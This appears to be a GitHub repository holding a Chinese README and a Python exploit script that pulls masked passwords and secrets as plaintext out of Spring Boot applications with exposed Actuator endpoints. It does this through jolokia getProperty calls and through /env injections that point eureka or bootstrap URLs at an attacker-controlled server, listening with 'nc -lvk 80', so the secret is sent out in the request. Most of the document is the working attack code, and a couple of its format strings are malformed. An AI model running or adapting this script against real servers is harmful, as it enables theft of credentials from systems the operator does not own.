├── README.md ├── SpringBootEnvDecrypt.py └── test.png /README.md: -------------------------------------------------------------------------------- 1 | # SpringBootEnvDecrypt 2 | SpringBoot获取被星号脱敏的密码的明文 3 | 4 | 懒癌发作,随手撸一个脚本 5 | 6 | ![](https://github.com/heikanet/SpringBootEnvDecrypt/blob/main/test.png) 7 | -------------------------------------------------------------------------------- /SpringBootEnvDecrypt.py: -------------------------------------------------------------------------------- 1 | ''' 2 | refer:https://github.com/LandGrey/SpringBootVulExploit 3 | author:说书人 4 | github:https://github.com/heikanet 5 | ''' 6 | 7 | import requests 8 | import json 9 | import urllib3 10 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 11 | 12 | proxy={'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'} 13 | 14 | def jolokia(url,type,key): 15 | headers = {'Content-Type': 'application/json'} 16 | if type=='1': 17 | try: 18 | data = {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", 19 | "type": "EXEC", "arguments": [key]} 20 | res=requests.post(url+'/jolokia',data=json.dumps(data),headers=headers,verify=False).json() 21 | if 'value' in res.keys(): 22 | print('[+]jolokia接口1利用成功,[{}]的值为:{}'.format(key,res['value'])) 23 | else: 24 | print('[-]jolokia接口1利用失败') 25 | data = { 26 | "mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", 27 | "operation": "getProperty", "type": "EXEC", "arguments": [key]} 28 | res = requests.post(url + '/jolokia', data=json.dumps(data), headers=headers, verify=False).json() 29 | if 'value' in res.keys(): 30 | print('[+]jolokia接口2利用成功,[{}]的值为:{}'.format(key, res['value'])) 31 | else: 32 | print('[-]jolokia接口2利用失败') 33 | except: 34 | print('[error]jolokia接口访问失败') 35 | else: 36 | try: 37 | data = {"mbean": "org.springframework.boot:name=SpringApplication,type=Admin", "operation": "getProperty", 38 | "type": "EXEC", "arguments": [key]} 39 | res = requests.post(url + '/actuator/jolokia', data=json.dumps(data), headers=headers,verify=False).json() 40 | if 'value' in res.keys(): 41 | print('[+]jolokia接口1利用成功,[{}]的值为:{}'.format(key,res['value'])) 42 | else: 43 | print('[-]jolokia接口1利用失败') 44 | data = { 45 | "mbean": "org.springframework.cloud.context.environment:name=environmentManager,type=EnvironmentManager", 46 | "operation": "getProperty", "type": "EXEC", "arguments": [key]} 47 | res = requests.post(url + '/actuator/jolokia', data=json.dumps(data), headers=headers, 48 | verify=False).json() 49 | if 'value' in res.keys(): 50 | print('[+]jolokia接口2利用成功,[{}]的值为:{}'.format(key, res['value'])) 51 | else: 52 | print('[-]jolokia接口2利用失败') 53 | except: 54 | print('[error]jolokia接口访问失败') 55 | 56 | 57 | def env(url,type,key): 58 | print('[*]尝试env接口') 59 | print('[*]先在自己控制的外网服务器上监听http端口:\n如监听80端口:nc -lvk 80') 60 | IpPort=input('输入监听的ip:port==>') 61 | if type=='1': 62 | headers = {'Content-Type': 'application/x-www-form-urlencoded'} 63 | try: 64 | data = 'eureka.client.serviceUrl.defaultZone=http://value:${{}}@{}'.format(key, IpPort) 65 | requests.post(url+'/env',data=data,headers=headers,verify=False) 66 | requests.post(url + '/refresh', headers=headers, verify=False) 67 | print('[*]env接口1请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败') 68 | IsOk=input('请选择:') 69 | if IsOk=='2': 70 | data = 'spring.cloud.bootstrap.location=http://{}}/?=${{}}'.format(IpPort,key) 71 | requests.post(url + '/env', data=data, headers=headers, verify=False) 72 | requests.post(url + '/refresh', headers=headers, verify=False) 73 | print('[*]env接口2请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败') 74 | IsOk = input('请选择:') 75 | if IsOk == '2': 76 | data = 'eureka.client.serviceUrl.defaultZone=http://{}}/${{}}'.format(IpPort, key) 77 | requests.post(url + '/env', data=data, headers=headers, verify=False) 78 | requests.post(url + '/refresh', headers=headers, verify=False) 79 | print('[*]env接口3请求发送成功,请查看服务器是否收到请求\n若没利用成功,可以放弃了') 80 | except: 81 | print('[error]env接口访问失败') 82 | else: 83 | headers = {'Content-Type': 'application/json'} 84 | try: 85 | data = {"name":"eureka.client.serviceUrl.defaultZone","value":"http://value:${{}}@{}".format(key,IpPort)} 86 | requests.post(url + '/actuator/env', data=json.dumps(data), headers=headers, verify=False) 87 | requests.post(url + '/actuator/refresh', headers=headers, verify=False) 88 | print('[*]env接口1请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败') 89 | IsOk = input('请选择:') 90 | if IsOk == '2': 91 | data = {"name":"spring.cloud.bootstrap.location","value":"http://{}/?=${{}}".format(IpPort, key)} 92 | requests.post(url + '/actuator/env', data=json.dumps(data), headers=headers, verify=False) 93 | requests.post(url + '/actuator/refresh', headers=headers, verify=False) 94 | print('[*]env接口2请求发送成功,请查看服务器是否收到请求\n若没利用成功,可选择继续利用,请保持监听正常\n1.成功 2.失败') 95 | IsOk = input('请选择:') 96 | if IsOk == '2': 97 | data = {"name":"eureka.client.serviceUrl.defaultZone","value":"http://{}/${{}}".format(IpPort, key)} 98 | requests.post(url + '/actuator/env', data=json.dumps(data), headers=headers, verify=False) 99 | requests.post(url + '/actuator/refresh', headers=headers, verify=False) 100 | print('[*]env接口3请求发送成功,请查看服务器是否收到请求\n若没利用成功,可以放弃了') 101 | except: 102 | print('[error]env接口访问失败') 103 | 104 | 105 | banner='''==========Spring Boot获取被星号脱敏的密码==========''' 106 | print(banner) 107 | print('1.[spring 1.x版本] 2.[spring 2.x版本]') 108 | type=input('请选择:') 109 | key=input('输入要获取的key:') 110 | url=input('输入url:') 111 | jolokia(url,type,key) 112 | env(url,type,key) -------------------------------------------------------------------------------- /test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ssrsec/SpringBootEnvDecrypt/46b76e6a287312ba294c8a65ef9c0d1c9468275f/test.png --------------------------------------------------------------------------------